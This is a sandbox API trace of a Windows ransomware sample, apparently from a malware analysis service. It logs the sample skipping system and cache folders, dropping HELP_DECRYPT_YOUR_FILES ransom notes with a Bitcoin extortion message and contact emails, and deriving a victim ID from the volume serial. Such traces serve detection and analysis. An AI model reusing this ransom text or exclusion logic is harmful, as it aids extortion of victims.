	[0177.794] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.794] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.794] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.795] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.795] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.795] CloseHandle (hObject=0x384) returned 1
	[0177.795] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x837ce089, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.796] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*") returned 41
	[0177.796] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.796] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\all users\\microsoft\\xboxlive\\*.*") returned 0x29
	[0177.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.796] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="windows") returned 0x0
	[0177.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.796] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="boot") returned 0x0
	[0177.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.797] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="system volume information") returned 0x0
	[0177.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.797] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.797] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="temp") returned 0x0
	[0177.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="program files") returned 0x0
	[0177.798] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.798] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="appdata") returned 0x0
	[0177.798] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="application data") returned 0x0
	[0177.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="winnt") returned 0x0
	[0177.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="tmp") returned 0x0
	[0177.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="cache") returned 0x0
	[0177.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="webcache") returned 0x0
	[0177.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="inetcache") returned 0x0
	[0177.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="nvidia") returned 0x0
	[0177.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="packages") returned 0x0
	[0177.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="cookies") returned 0x0
	[0177.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="programdata") returned 0x0
	[0177.801] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.801] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.801] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x837ce089, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.802] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.802] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x837ce089, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x837ce089, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8381a45f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0177.802] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x837ce089, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x837ce089, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x837ce089, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0177.802] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NSALCache", cAlternateFileName="NSALCA~1")) returned 1
	[0177.802] lstrcmpW (lpString1="NSALCache", lpString2="..") returned 1
	[0177.802] lstrcmpW (lpString1="NSALCache", lpString2=".") returned 1
	[0177.802] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\XboxLive" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive") returned="C:\\Users\\All Users\\Microsoft\\XboxLive"
	[0177.802] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\"
	[0177.802] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\", lpString2="NSALCache" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache"
	[0177.802] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache"
	[0177.803] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\"
	[0177.803] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\"
	[0177.803] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*"
	[0177.803] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.803] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*") returned 51
	[0177.803] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.804] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*") returned 0x33
	[0177.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.804] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="windows") returned 0x0
	[0177.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.804] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="boot") returned 0x0
	[0177.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.804] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="system volume information") returned 0x0
	[0177.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.805] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.805] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="temp") returned 0x0
	[0177.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.805] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="program files") returned 0x0
	[0177.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.805] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.806] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="appdata") returned 0x0
	[0177.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.806] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="application data") returned 0x0
	[0177.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.806] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="winnt") returned 0x0
	[0177.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.806] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="tmp") returned 0x0
	[0177.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.807] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="cache") returned="cache\\*.*"
	[0177.807] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.808] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache"
	[0177.808] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*"
	[0177.808] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.808] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.808] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\HELP_DECRYPT_YOUR_FILES.TXT") returned 75
	[0177.808] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.809] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.809] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.811] CloseHandle (hObject=0x388) returned 1
	[0177.812] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.812] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0177.813] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.813] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.813] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.814] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.814] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0177.814] CloseHandle (hObject=0x388) returned 1
	[0177.814] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.814] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.815] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.815] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\HELP_DECRYPT_YOUR_FILES.HTML") returned 76
	[0177.815] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.815] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.815] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0177.818] CloseHandle (hObject=0x388) returned 1
	[0177.818] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.818] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.819] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.819] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0177.820] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.821] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.821] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.821] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.821] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0177.821] CloseHandle (hObject=0x388) returned 1
	[0177.822] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8384067b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.822] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*") returned 51
	[0177.822] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.822] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*") returned 0x33
	[0177.822] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.822] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="windows") returned 0x0
	[0177.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.825] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="boot") returned 0x0
	[0177.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.825] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="system volume information") returned 0x0
	[0177.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.826] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.826] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="temp") returned 0x0
	[0177.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.826] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="program files") returned 0x0
	[0177.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.826] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.827] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="appdata") returned 0x0
	[0177.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.827] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="application data") returned 0x0
	[0177.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.827] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="winnt") returned 0x0
	[0177.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.827] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="tmp") returned 0x0
	[0177.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.828] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\*.*", lpSrch="cache") returned="cache\\*.*"
	[0177.828] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
